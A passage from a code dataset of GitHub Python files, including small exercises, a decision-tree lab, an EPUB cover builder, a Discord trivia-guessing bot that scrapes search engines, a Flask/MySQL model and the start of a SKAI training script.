buff:\n\ti=0\n\tk=sorted(buff[name])\n\tl=len(k)\n\twhile True:\n\t\tif i + 1 == l: break\n\t\tif k[i+1] - k[i] != 1:\n\t\t\tprint('Hole: ' + name + ' -> ' + str(k[i]))\n\t\ti+=1\n\n","repo_name":"CzechLitBib/UCL","sub_path":"graveyard/shelf/seq.py","file_name":"seq.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"70312861209","text":"#Reto #10: LA API\n#MPublicación: 06/03/23 | MEDIA\n\n#Llamar a una API es una de las tareas más comunes en programación. \n#Implementa una llamada HTTP a una API (la que tú quieras) y muestra su resultado a través de la terminal. \n# Por ejemplo: Pokémon, Marvel...\n\n#Aquí tienes un listado de posibles APIs: \n#https://github.com/public-apis/public-apis\n \n\n#python -m pip install --upgrade pip \n#pip install requests \n\nimport requests\n\ndef get_pokemons():\n url = \"https://pokeapi.co/api/v2/pokemon?limit=20\"\n response = requests.get(url)\n for index, pokemon in enumerate(response.json()[\"results\"]):\n pokemon_name = pokemon[\"name\"]\n print(f\"{index + 1}) {pokemon_name}\")\n\ndef get_starwars_characters():\n url = \"https://swapi.dev/api/people/?limit=10&page=2\"\n response = requests.get(url)\n for index, character in enumerate(response.json()[\"results\"]):\n character_name = character[\"name\"]\n print(f\"{index + 1}) {character_name}\")\n\nif __name__ == '__main__':\n get_pokemons()\n get_starwars_characters()","repo_name":"gwf-training/python-retos-semanales","sub_path":"src/retos-2023/10-request-api.py","file_name":"10-request-api.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19765103855","text":"import numpy as np\n\ndef main():\n n = int(input())\n a = np.array(list(map(int,input().split())))\n cost = float(\"inf\")\n for integer in range(-100, 101):\n to_list = np.ones(n)*integer\n temp = np.sum( (a - to_list) ** 2 )\n cost = min(cost, temp)\n print(int(cost))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"shimomura314/AtcoderCodes","sub_path":"ABC043/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29672508441","text":"a, b = input().split()\n\nbrown = int(a)\n\nred = int(b)\n\nanswer = []; \n\nwidth = brown + red\n\nfor i in range(1,int(width/2)):\n if(width % 1 == 0):\n n = i\n m = width/n\n if(n < m):\n continue\n\n tmp = (n-2) * (m-2)\n tmp2 = width - tmp\n if(tmp == red and tmp2 == brown):\n print(n,m)\n break\n","repo_name":"InSeok9068/Algorithm","sub_path":"프로그래머스/카펫.py","file_name":"카펫.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7640977948","text":"from pathlib import Path\n\nfrom lxml import etree\n\nfrom . import shared\nfrom core.documents.templates import EPUB2Template\n\n\ndef make_html_element(cover_file: Path) -> etree._Element:\n template = EPUB2Template([])\n html = template.generate_root_element(\"Cover\")\n\n head = html.find(\"head\")\n assert head is not None\n style = make_style_element()\n head.append(style)\n\n body = make_body_element(cover_file)\n html.append(body)\n\n return html\n\n\ndef make_body_element(cover_file: Path) -> etree._Element:\n body = etree.Element(\"body\")\n\n div = etree.Element(\n \"div\",\n attrib={\n \"class\": \"cover-container\"\n }\n )\n body.append(div)\n\n img = etree.Element(\n \"img\",\n attrib={\n \"alt\": \"Cover\",\n \"src\": cover_file.as_posix()\n }\n )\n div.append(img)\n\n return body\n\n\ndef make_style_element() -> etree._Element:\n style = etree.Element(\n \"style\",\n attrib={\n \"type\": \"text/css\"\n }\n )\n style.text = shared.CSS_STYLE\n return style\n","repo_name":"jayruin/web-epubs","sub_path":"core/documents/cover_xhtml/epub2.py","file_name":"epub2.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33114180352","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn import tree\n\n# Wczytanie danych\ndata = pd.read_csv(\"C:/Users/User/Desktop/lab4/wdbc (1).data\",sep=\",\", header=None)\ndata.columns = [\"id\", \"diagnosis\", \"radius_mean\", \"texture_mean\", \"perimeter_mean\", \"area_mean\", \n \"smoothness_mean\", \"compactness_mean\", \"concavity_mean\", \"concave points_mean\", \n \"symmetry_mean\", \"fractal_dimension_mean\", \"radius_se\", \"texture_se\", \"perimeter_se\", \n \"area_se\", \"smoothness_se\", \"compactness_se\", \"concavity_se\", \"concave points_se\", \n \"symmetry_se\", \"fractal_dimension_se\", \"radius_worst\", \"texture_worst\", \n \"perimeter_worst\", \"area_worst\", \"smoothness_worst\", \"compactness_worst\", \n \"concavity_worst\", \"concave points_worst\", \"symmetry_worst\", \"fractal_dimension_worst\"]\n\ndata = data.drop([\"id\"], axis=1)\n\n# Wypisanie informacji o klasach i liczbach próbek\nprint(\"Klasy: \", data['diagnosis'].unique())\nprint(\"Liczba próbek: \", len(data))\nprint(\"Liczba próbek w klasach:\")\nprint(data['diagnosis'].value_counts())\n\n# usuwanie brakujacych\nprint(\"Brakujące wartości: \", data.isnull().sum().sum())\n\n# podział na test i train \nX = data.drop([\"diagnosis\"], axis=1)\ny = data[\"diagnosis\"]\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)\n\n# drzewo decyzyjne\nclf = DecisionTreeClassifier(random_state=42)\nclf.fit(X_train, y_train)\n\n# predykcja dla danych testowych\npredictions = clf.predict(X_test)\n\n\n# macierzy pomyłek i statystyk klasyfikacji\nprint(confusion_matrix(y_test, predictions))\nprint(classification_report(y_test, predictions))\n\n#wyświetlanie drzewa\nplt.figure(figsize=(40,30))\ntree.plot_tree(clf, filled=True)\nplt.show()\n\n\n# In[2]:\n\n\n# min_samples_leaf\nfor leaf in [5, 10, 25]:\n clf = DecisionTreeClassifier(random_state=42, min_samples_leaf=leaf)\n clf.fit(X_train, y_train)\n print(f\"Score dla leaf = {leaf}: {clf.score(X_test, y_test)}\")\n plt.figure(figsize=(40,30))\n tree.plot_tree(clf, filled=True)\n plt.show()\n# parametr decyzduje o dalszym podziale na nody, ale sprawdzając wcześniej czy po podziale w obu nodach będzie przynajmniej \n# odpowiednia liczba danych ustalona przez ten parametr. Jeśli to musi wybrać inną cechę do podjęcia decyzji, która \n# która będzie spełniać ten warunek.\n#Wniosek: parametr pozwala na zablokowanie zbytniego rozdrabniania danych w liściach. W pewien sposob ogranicza to wystepowanie\n# przeuczenia. Jeżeli danych jest za mało to w skrajnym przypadku nie następuje już dalszy podział. \n\n\n\n\n\n\n# In[3]:\n\n\n# max_depth\nfor depth in [1, 5, 10]:\n clf = DecisionTreeClassifier(random_state=42, max_depth=depth)\n clf.fit(X_train, y_train)\n print(f\"max_depth = {depth}: {clf.score(X_test, y_test)}\")\n # Wydrukowanie drzewa\n plt.figure(figsize=(40,30))\n tree.plot_tree(clf, filled=True)\n plt.show()\n \n# wnioski : Podobnie jak pozostałe podane parametry pomaga ograniczyć efekt przeuczenia poprzez ograniczenie głebokości\n# drzewa. Dla niektórych przypadków będzie to zły wybór np, jeśli jedna noga nie zdąży podzielić swojego dużego zbioru danych\n# ale skończy mu się dozwolona głębokość drzewa to nie jest w stanie dalej podzielić tego zbioru.\n# dlatego lepszym rozwiązaniem może być dwa pozosta��e parametry którymi ograniczamy drzewo (min samples: leaf, split)\n# które ograniczają nadmierne rozdrabnianie danych w liściach, a nie ograniczają samej głębokości drzewa.\n# Zbyt wysoka wartośc w porównaniu do całkowitej ilości danych może zakończyc naukę zbyt szybko, zanim \n# drzewo czegoś się nauczy, a zbyt mała dopuścić może od przeuczenia\n\n\n# In[5]:\n\n\n# min_samples_split\nfor split in [2, 5, 10]:\n clf = DecisionTreeClassifier(random_state=42, min_samples_split=split)\n clf.fit(X_train, y_train)\n print(f\"Score dla split = {split}: {clf.score(X_test, y_test)}\")\n plt.figure(figsize=(40,30))\n tree.plot_tree(clf, filled=True)\n plt.show()\n \n# parametr ogranicza jaka musi być minimalna ilosc danych w węźle aby dopuścić do jego dalszego podziału. \n# Lekko odmienne podejście niż min_samples_leaf, bo tutaj sprawdzamy ilosc danych przed podziałem a nie po.\n# Zbyt wysoka wartośc w porównaniu do całkowitej ilości danych może zakończyc naukę zbyt szybko, zanim \n# drzewo czegoś się nauczy, a zbyt mała dopuścić może od przeuczenia\n\n","repo_name":"EldritchE/AI_Uczenie_Maszynowe","sub_path":"Robert Jaworski 81591 LAB4_klasyfikacja z użyciem drzew decyzyjnych.py","file_name":"Robert Jaworski 81591 LAB4_klasyfikacja z użyciem drzew decyzyjnych.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19795366270","text":"\r\nimport discord\r\nfrom discord.ext.commands import Bot\r\nfrom discord.ext import commands\r\nimport asyncio\r\nimport time\r\nimport os\r\nimport requests\r\nfrom re import split,sub\r\nimport datetime\r\nfrom bs4 import BeautifulSoup\r\nimport random\r\n\r\noverall_miss=0\r\nmiss=0\r\noverall_questions=0\r\no1=\" \"\r\no2=\" \"\r\no3=\" \"\r\nq1=\" \"\r\ncounter=0\r\nl=[]\r\nl1=[]\r\n\r\nClient = discord.Client()\r\nclient = commands.Bot(command_prefix = \"?\")\r\n\r\nchat_filter = [\"DISCOdRD\"]\r\nbypass_list = []\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(\"Bot is online and connected to Discord\")\r\n## await client.say(\"Bot is online and connected to Discord\")\r\n await client.change_presence(game=discord.Game(name=\"Busy Being AWESOME\"))\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n global overall_miss,miss,overall_questions,id1,abcd1,o1,o2,o3,q1,counter,l,l1\r\n \r\n \r\n if message.content.lower().startswith('?miss'):\r\n overall_miss=overall_miss+1\r\n miss=miss+1\r\n \r\n if message.content.lower().startswith('?reset'):\r\n miss=0\r\n counter=0\r\n\r\n \r\n if message.content.lower().startswith('?thankyou'):\r\n \r\n await client.send_message(message.channel, \"Thank you for your TRUST in the BLOT (not a typo)\")\r\n await client.send_message(message.channel, \"Developed by- <@277695189131460609>\")\r\n await client.send_message(message.channel, \"Subscription- FREE until i change my mind :P\")\r\n await client.send_message(message.channel, \"Today's stats = \"+ str(10-miss)+\" / \" +str(10))\r\n #await client.send_message(message.channel, \"Overall stats = \"+ str(overall_questions-overall_miss)+\" / \" +str(overall_questions))\r\n #await client.send_message(message.channel, \"Accuracy = \"+ str((overall_questions-overall_miss)/ overall_questions*100))\r\n #await client.send_message(message.channel, \"BLOT going to Sleep :sleeping:\")\r\n \r\n if message.content.lower() == \"cookie\":\r\n await client.send_message(message.channel, \":cookie:\") #responds with Cookie emoji when someone says \"cookie\"\r\n \r\n if message.content.lower() == \"owner\" or message.content.lower() == \"?father\" or message.content.lower() == \"?owner\" or message.content.lower() == \"?maker\":\r\n await client.send_message(message.channel, \"<@277695189131460609> NISHANTH D A\")\r\n\r\n if message.content.upper().startswith('!PING'):\r\n userID = message.author.id\r\n await client.send_message(message.channel, \"<@%s> Pong!\" % (userID))\r\n \r\n if message.content.upper().startswith('?OFFENDERS'):\r\n for offenders in l1:\r\n if offenders !=\"277695189131460609\":\r\n await client.send_message(message.channel, \"<@%s> \" % (offenders))\r\n \r\n if message.content.upper().startswith('?ROLL'): \r\n userID = message.author.id\r\n if str(userID) in l:\r\n await client.send_message(message.channel, \"<@%s> \" % (userID)+\"U have typed ` ?roll ` more than once...as PUNISHMENT you'll be DEAFENED for atleast 24hr... Enjoy the SILENCE\" )\r\n l1.append(str(userID))\r\n else:\r\n ran=random.randint(1, 4)\r\n if ran==1:\r\n color=\"RED -- Griffindor :heart: \"\r\n elif ran==2:\r\n color=\"YELLOW -- Hufflepuff :yellow_heart:\"\r\n elif ran==3:\r\n color=\"BLUE -- Ravenclaw :blue_heart: \" \r\n else :\r\n color=\"GREEN -- Slytherin :green_heart: \"\r\n \r\n await client.send_message(message.channel, \"<@%s> \" % (userID)+str(ran)+\" \"+color)\r\n l.append(str(userID))\r\n \r\n if message.content.lower() == \"?here\": \r\n #await client.send_message(message.channel, \"BOT Offline ...till things calm down :cookie:\")\r\n if str(message.author.id)==\"277695189131460609\" or str(message.author.id)==\"366125961206300673\" or str(message.author.id)==\"447038097893490688\":\r\n id1= str(message.channel.id )\r\n await client.send_message(message.channel, \"Got it\") \r\n \r\n \r\n \r\n if message.content.upper().startswith('!SAY'):\r\n args = message.content.split(\" \")\r\n #args[0] = !SAY\r\n #args[1] = Hey\r\n #args[2] = There\r\n #args[1:] = Hey There\r\n await client.send_message(message.channel, \"%s\" % (\" \".join(args[1:])))\r\n\r\n contents = message.content.split(\" \") #contents is a list type\r\n for word in contents:\r\n if word.upper() in chat_filter:\r\n if not message.author.id in bypass_list:\r\n try:\r\n #await client.delete_message(message)\r\n await asyncio.sleep(1)\r\n await client.send_message(message.channel, \" is not a bad word !!! <@159985870458322944> you NUTS?? :sunglasses: \")#**Hey!** You're not allowed to use that word here!\r\n except discord.errors.NotFound:\r\n return\r\n\r\n if message.content.lower() == \"?end\":\r\n if str(message.author.id)==\"277695189131460609\" or str(message.author.id)==\"436513875744129025\":\r\n counter=counter+1\r\n await client.send_message(discord.Object(id=id1),embed=discord.Embed(description=o1+\"\\n\"+o2+\"\\n\"+o3, colour=0x3DF270,timestamp=datetime.datetime.utcnow()).set_author(name=q1).set_footer(text=\"This Marks the END of \"+str(counter)+\"/10 \"+\" Question\").set_thumbnail(url=\"https://media.dayoftheshirt.com/images/shirts/SZUYqr6vhrvw/teetee_fsociety_1459811529.full.png\"))\r\n \r\n #Default https://media.dayoftheshirt.com/images/shirts/SZUYqr6vhrvw/teetee_fsociety_1459811529.full.png \r\n #BB http://www.dqweek.com/wp-content/uploads/2018/05/BrainBaazi.jpg\r\n #Loco https://pbs.twimg.com/profile_images/958726814377172992/pHAMA2K9.jpg\r\n #SWoo https://is1-ssl.mzstatic.com/image/thumb/Purple118/v4/56/ca/91/56ca9199-cc45-4367-fe4a-ce5a3517e4e6/AppIcon-1x_U007emarketing-0-0-GLES2_U002c0-512MB-sRGB-0-0-0-85-220-0-0-0-5.png/246x0w.jpg\r\n if message.content.lower().startswith('?guess '):\r\n \r\n overall_questions = overall_questions +1\r\n \r\n var=message.content\r\n var=var[6:]\r\n s=var.split(\"\\n\")\r\n \r\n length=len(s) \r\n if(len(s[0])<6):\r\n s[0]=\"\"\r\n \r\n o3=s[length-1]\r\n o2=s[length-2]\r\n o1=s[length-3] \r\n q=\" \"\r\n for i in range(0,length-3):\r\n if q[-1] !=\" \":\r\n q=q+\" \"\r\n q+=s[i]\r\n \r\n #await client.send_message(message.channel, q) \r\n q1=q\r\n q=q.replace(\" \",\"+\")\r\n \r\n \r\n\r\n\r\n## tab=\"https://www.bing.com/search?q=\"\r\n tabb=\"https://search.aol.com/aol/search?s_chn=prt_bon&q=\" \r\n tab1=\"https://search.aol.com/aol/search?s_chn=prt_bon&q=\" #num=30&ei=py29WruLGoiSvQSbsIjYAg&\r\n tab2=\"https://www.google.co.in/search?q=\"\r\n tab3=\"https://duckduckgo.com/html/?q=\"\r\n \r\n #await client.send_message(message.channel, tab2+q)\r\n await client.send_message(discord.Object(id=id1),tab2+q)\r\n \r\n## response=requests.get(tab+q+\"&count=30\") \r\n## soup=BeautifulSoup(response.text,\"html.parser\") \r\n response1=requests.get(tabb+q) \r\n soup1=BeautifulSoup(response1.text,\"html.parser\")\r\n #print(soup1)\r\n \r\n \r\n #print (links)\r\n for link in soup1.find_all(\"a\",{\"class\": \" ac-algo fz-l ac-21th lh-24\"}): \r\n firstlink=split(\":(?=http)\",link[\"href\"].replace(\"/url?q=\",\"\"))\r\n break\r\n \r\n \r\n # print (firstlink)\r\n \r\n \r\n \r\n firstlink[0]=firstlink[0][0:]\r\n #print(firstlink[0])\r\n \r\n response2=requests.get(firstlink[0]) \r\n soup2=BeautifulSoup(response2.text,\"html.parser\")\r\n\r\n response3=requests.get(tab3+q) \r\n soup3=BeautifulSoup(response3.text,\"html.parser\")\r\n\r\n \r\n #break\r\n## for anchor in soup.findAll('a', href=True):\r\n## print anchor['href']\r\n## ss1=soup.get_text().lower() \r\n ss2=soup1.get_text().lower()\r\n #print (ss2)\r\n ss3=soup2.get_text().lower()\r\n ss4=soup3.get_text().lower()\r\n ## ss15=ss1.split(\" resultsdate language region\",1)[0]\r\n ## ss1=ss1.split(\" resultsdate language region\",1)[1]\r\n #print(ss1)\r\n## ss1=sub('\\W+','', ss1)\r\n ss2=sub('\\W+','', ss2)\r\n ss3=sub('\\W+','', ss3)\r\n ss4=sub('\\W+','', ss4)\r\n #re.sub('\\W+','', string)\r\n\r\n ox=o1.lower().split(\" \")\r\n oy=o2.lower().split(\" \")\r\n oz=o3.lower().split(\" \")\r\n## print(ox)\r\n## print(oy)\r\n## print(oz)\r\n \r\n\r\n oa=sub('\\W+','', o1)\r\n ob=sub('\\W+','', o2)\r\n oc=sub('\\W+','', o3)\r\n \r\n ca=ss3.count(oa.lower()) \r\n cb=ss3.count(ob.lower())\r\n cc=ss3.count(oc.lower())\r\n \r\n c1= ss2.count(oa.lower()) + ca +ss4.count(oa.lower())#+ss1.count(oa.lower())\r\n c2= ss2.count(ob.lower()) + cb+ss4.count(ob.lower())#+ ss1.count(ob.lower()) \r\n c3= ss2.count(oc.lower()) + cc+ss4.count(oc.lower())#+ ss1.count(oc.lower()) \r\n\r\n print()\r\n m=max(c1,c2,c3)\r\n m1=min(c1,c2,c3)\r\n #await client.send_message(message.channel, o1+\" \"+str(c1)+\" \"+str(ca))\r\n #await client.send_message(message.channel, o2+\" \"+str(c2)+\" \"+str(cb))\r\n #await client.send_message(message.channel, o3+\" \"+str(c3)+\" \"+str(cc))\r\n\r\n \r\n if m==c1:\r\n \r\n await client.send_message(message.channel,\"\\n\"+\"Best Possibility= \"+\"111 \"+o1) \r\n #await client.send_message(discord.Object(id='464836410373832704'), 'hello')\r\n if(m!=0):\r\n## await client.send_message(discord.Object(id=id1),\"\\n\"+\"Best Possibility= \"+\"111 \"+o1) \r\n await client.send_message(discord.Object(id=id1),embed=discord.Embed(description=\"Best Possibility\", colour=0x3DF270).set_author(name=o1,icon_url=\"https://upload.wikimedia.org/wikipedia/commons/thumb/3/3f/NYCS-bull-trans-1.svg/1024px-NYCS-bull-trans-1.svg.png\"))\r\n \r\n elif m==c2:\r\n await client.send_message(message.channel, \"\\n\"+\"Best Possibility= \"+\"222 \"+o2)\r\n## await client.send_message(discord.Object(id=id1), \"\\n\"+\"Best Possibility= \"+\"222 \"+o2) \r\n await client.send_message(discord.Object(id=id1),embed=discord.Embed(description=\"Best Possibility\", colour=0x3DF270).set_author(name=o2,icon_url=\"https://image.ibb.co/bTTHWy/number_2_two_icon_11920.png\"))\r\n \r\n elif m==c3:\r\n await client.send_message(message.channel, \"\\n\"+\"Best Possibility= \"+\"333 \"+o3)\r\n #await client.send_message(discord.Object(id=id1), \"\\n\"+\"Best Possibility= \"+\"333 \"+o3)\r\n await client.send_message(discord.Object(id=id1),embed=discord.Embed(description=\"Best Possibility\", colour=0x3DF270).set_author(name=o3,icon_url=\"https://i0.wp.com/tantrwm.com/wp-content/uploads/2016/11/Tantrwm-Video-Production-Wales-Filming-Live-Streaming-Webcasts-Webcastings-Production-3-man-film-crew.png?fit=2000%2C2000\"))\r\n \r\n \r\n if m1==c1:\r\n await client.send_message(message.channel, \"\\n\"+\"Least Possibility= \"+\"111 \"+o1) \r\n if(m!=0):\r\n await client.send_message(discord.Object(id=id1),\"```\\n\"+\"Least Possibility= \"+\"111 \"+o1+\"```\")\r\n \r\n elif m1==c2:\r\n await client.send_message(message.channel, \"\\n\"+\"Least Possibility= \"+\"222 \"+o2)\r\n await client.send_message(discord.Object(id=id1),\"```\\n\"+\"Least Possibility= \"+\"222 \"+o2+\"```\")\r\n elif m1==c3:\r\n await client.send_message(message.channel, \"\\n\"+\"Least Possibility= \"+\"333 \"+o3)\r\n await client.send_message(discord.Object(id=id1),\"```\\n\"+\"Least Possibility= \"+\"333 \"+o3+\"```\")\r\n\r\n \r\n \r\n ## print(c1)\r\n ## print(o2)\r\n ## print(c2)\r\n ## print(o3)\r\n ## print(c3) \r\n\r\n cxx=0\r\n cyy=0\r\n czz=0\r\n abcd=\" \"\r\n \r\n if(len(ox)>=1):\r\n for w in ox:\r\n w=sub('\\W+','', w)\r\n if(len(w)>2 and w !=\"the\" and w !=\"that\" and w !=\"this\" and w !=\"and\" ):\r\n if(w not in oy and w not in oz):\r\n cx=ss2.count(w.lower()) + ss3. count(w.lower())+ss4.count(w.lower())\r\n cxx=cxx+cx \r\n abcd=abcd+ str(w)+\" (\"+str(cx)+\") \"\r\n abcd1 = abcd + \"\\n\" \r\n await client.send_message(message.channel, \" \"+abcd+\" \"+str(cxx) )\r\n abcd=\"\"\r\n## await client.send_message(message.channel, \" \"+ )\r\n if(len(oy)>=1):\r\n for w in oy:\r\n w=sub('\\W+','', w)\r\n if(len(w)>2 and w !=\"the\" and w !=\"that\" and w !=\"this\" and w !=\"and\" ):\r\n if(w not in ox and w not in oz):\r\n cy=ss2.count(w.lower()) + ss3. count(w.lower())+ss4.count(w.lower())\r\n cyy=cyy+cy\r\n abcd=abcd+str(w)+\" (\"+str(cy)+\") \"\r\n abcd1=abcd1+abcd+\"\\n\" \r\n await client.send_message(message.channel, \" \"+abcd+\" \"+str(cyy) )\r\n abcd=\"\"\r\n## await client.send_message(message.channel, \" \"+str(cyy) )\r\n if(len(oz)>=1):\r\n for w in oz:\r\n w=sub('\\W+','', w)\r\n if(len(w)>2 and w !=\"the\" and w !=\"that\" and w !=\"this\" and w !=\"and\" ):\r\n if(w not in oy and w not in ox):\r\n cz=ss2.count(w.lower()) + ss3. count(w.lower())+ss4.count(w.lower())\r\n czz=czz+cz\r\n abcd=abcd+str(w)+\" (\"+str(cz)+\") \"\r\n abcd1=abcd1+abcd+\"\\n\" \r\n await client.send_message(message.channel, \" \"+abcd +\" \"+str(czz) )\r\n abcd=\"\"\r\n## await client.send_message(message.channel, \" \"+str(czz) )\r\n \r\n \r\n if message.content.lower().startswith('?hits'):\r\n await client.send_message(message.channel,embed=discord.Embed(description=abcd1, colour=0x3DF270).set_author(name=\"Hits\",icon_url=\"https://image.ibb.co/n250Jd/iconfinder_white.png\").set_footer(text=\"Be a Fountain. Not a Drain. #GiveAndTake\") )\r\n \r\n \r\n \r\n \r\n \r\n\r\nclient.run(os.getenv('TOKEN'))\r\n","repo_name":"nishu88/freefall_discord_bot","sub_path":"test_discord_bot.py","file_name":"test_discord_bot.py","file_ext":"py","file_size_in_byte":14828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73675337688","text":"from config import mysql\n\n\nclass Article(object):\n\n @staticmethod\n def add_article(title, about, content, image, publish, user_id, status):\n connection = mysql.get_db()\n cursor = mysql.get_db().cursor() # створюєм курсор\n sql_query = \"\"\"\n insert into news (title, about, content, image, publish, user_id, status)\n values (%s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n cursor.execute(sql_query, (title, about, content, image, publish, user_id, status))\n connection.commit()\n cursor.close()\n connection.close()\n\n\n @staticmethod\n def get_all_article() -> list:\n connection = mysql.get_db()\n cursor = mysql.get_db().cursor() # створюєм курсор\n sql_qwery = \"\"\"\n select * from news\n \"\"\"\n cursor.execute(sql_qwery)\n result = cursor.fetchall()\n cursor.close()\n connection.close()\n return result","repo_name":"grine1-flask/newsportal","sub_path":"models/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29029291608","text":"month = int(input())\nwater = 0\ninternet = 0\nothers = 0\nel = 0\nfor _ in range(month):\n electricity = float(input())\n el += electricity\n water += 20\n internet += 15\nothers += (water + internet + el) * 1.2\nmoney = water + internet + el + others\naverage = money / month\nprint(f\"Electricity: {el:.2f} lv\")\nprint(f\"Water: {water:.2f} lv\")\nprint(f\"Internet: {internet:.2f} lv\")\nprint(f\"Other: {others:.2f} lv\")\nprint(f\"Average: {average:.2f} lv\")\n","repo_name":"ilchevai/SoftUni","sub_path":"Programing basic june 2022/for_loop_extra/bills.py","file_name":"bills.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74320272729","text":"r\"\"\"Binary to run training on a single model once.\n\n\n# pylint: enable=line-too-long\n\"\"\"\n\nimport datetime\nimport logging as native_logging\nimport os\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nfrom ml_collections import config_flags\nimport pandas as pd\nfrom skai.model import data\nfrom skai.model import generate_bias_table_lib\nfrom skai.model import models\nfrom skai.model import sampling_policies\nfrom skai.model import train_lib\nfrom skai.model.configs import base_config\nimport tensorflow as tf\n\n\nFLAGS = flags.FLAGS\nconfig_flags.DEFINE_config_file('config')\nflags.DEFINE_bool('keep_logs', True, 'If True, creates a log file in output '\n 'directory. If False, only logs to console.')\nflags.DEFINE_bool(\n 'is_vertex', False, 'True if the training job will be executed on VertexAI.'\n)\nflags.DEFINE_string('ensemble_dir', '', 'If specified, loads the models at '\n 'this directory to consider the ensemble.')\nflags.DEFINE_string(\n 'trial_name',\n None,\n 'Name of the job trial that measurements should be submitted to. Format:'\n ' projects/{project}/locations/{location}/studies/{study}/trials/{trial}',\n)\n\n\ndef main(_) -> None:\n config = FLAGS.config\n base_config.check_flags(config)\n\n if FLAGS.keep_logs and not config.training.log_to_xm:\n if not tf.io.gfile.exists(config.output_dir):\n tf.io.gfile.makedirs(config.output_dir)\n stream = tf.io.gfile.GFile(\n os.path.join(config.output_dir, 'log'), mode='w'\n )\n stream_handler = native_logging.StreamHandler(stream)\n logging.get_absl_logger().addHandler(stream_handler)\n\n dataset_builder = data.get_dataset(config.data.name)\n ds_kwargs = {}\n if config.data.name == 'waterbirds10k':\n ds_kwargs = {'corr_strength': config.data.corr_strength}\n elif config.data.name == 'skai':\n ds_kwargs.update({\n 'tfds_dataset_name': config.data.tfds_dataset_name,\n 'data_dir': config.data.tfds_data_dir,\n 'labeled_train_pattern': config.data.labeled_train_pattern,\n 'unlabeled_train_pattern': config.data.unlabeled_train_pattern,\n 'validation_pattern': config.data.validation_pattern,\n 'use_post_disaster_only': config.data.use_post_disaster_only,\n 'load_small_images': config.data.load_small_images,\n })\n if config.data.use_post_disaster_only:\n config.model.num_channels = 3\n if config.upsampling.do_upsampling:\n ds_kwargs.update({\n 'upsampling_lambda': config.upsampling.lambda_value,\n 'upsampling_signal': config.upsampling.signal,\n })\n\n logging.info('Running Round %d of Training.', config.round_idx)\n get_split_config = lambda x: x if config.data.use_splits else 1\n if config.round_idx == 0:\n dataloader = dataset_builder(\n num_splits=get_split_config(config.data.num_splits),\n initial_sample_proportion=get_split_config(\n config.data.initial_sample_proportion),\n subgroup_ids=config.data.subgroup_ids,\n subgroup_proportions=config.data.subgroup_proportions, **ds_kwargs)\n else:\n # If latter round, keep track of split generated in last round of active\n # sampling\n dataloader = dataset_builder(config.data.num_splits,\n initial_sample_proportion=1,\n subgroup_ids=(),\n subgroup_proportions=(),\n **ds_kwargs)\n\n # Filter each split to only have examples from example_ids_table\n dataloader.train_splits = [\n dataloader.train_ds.filter(\n generate_bias_table_lib.filter_ids_fn(ids_tab)) for\n ids_tab in sampling_policies.convert_ids_to_table(config.ids_dir)]\n\n model_params = models.ModelTrainingParameters(\n model_name=config.model.name,\n train_bias=config.train_bias,\n num_classes=config.data.num_classes,\n num_subgroups=dataloader.num_subgroups,\n subgroup_sizes=dataloader.subgroup_sizes,\n worst_group_label=dataloader.worst_group_label,\n num_epochs=config.training.num_epochs,\n num_channels=config.model.num_channels,\n l2_regularization_factor=config.model.l2_regularization_factor,\n optimizer=config.optimizer.type,\n learning_rate=config.optimizer.learning_rate,\n batch_size=config.data.batch_size,\n load_pretrained_weights=config.model.load_pretrained_weights,\n use_pytorch_style_resnet=config.model.use_pytorch_style_resnet,\n do_reweighting=config.reweighting.do_reweighting,\n reweighting_lambda=config.reweighting.lambda_value,\n reweighting_signal=config.reweighting.signal\n )\n model_params.train_bias = config.train_bias\n output_dir = config.output_dir\n if FLAGS.is_vertex:\n # TODO: go/skai-instadeep - Create output_dir specific to job.\n start_time = datetime.datetime.now()\n timestamp = start_time.strftime('%Y-%m-%d-%H%M%S')\n output_dir = f'{output_dir}_{timestamp}'\n\n job_id = os.path.basename(FLAGS.trial_name)\n output_dir = os.path.join(config.output_dir, job_id)\n tf.io.gfile.makedirs(output_dir)\n example_id_to_bias_table = None\n\n if config.train_bias or (config.reweighting.do_reweighting and\n config.reweighting.signal == 'bias'):\n # Bias head will be trained as well, so gets bias labels.\n if config.path_to_existing_bias_table:\n example_id_to_bias_table = (\n generate_bias_table_lib.load_existing_bias_table(\n config.path_to_existing_bias_table,\n config.bias_head_prediction_signal,\n )\n )\n else:\n logging.info(\n 'Error: Bias table not found')\n return\n if config.data.use_splits:\n # Training a single model on a combination of data splits.\n included_splits_idx = [int(i) for i in config.data.included_splits_idx]\n new_train_ds = data.gather_data_splits(included_splits_idx,\n dataloader.train_splits)\n val_ds = data.gather_data_splits(included_splits_idx, dataloader.val_splits)\n elif 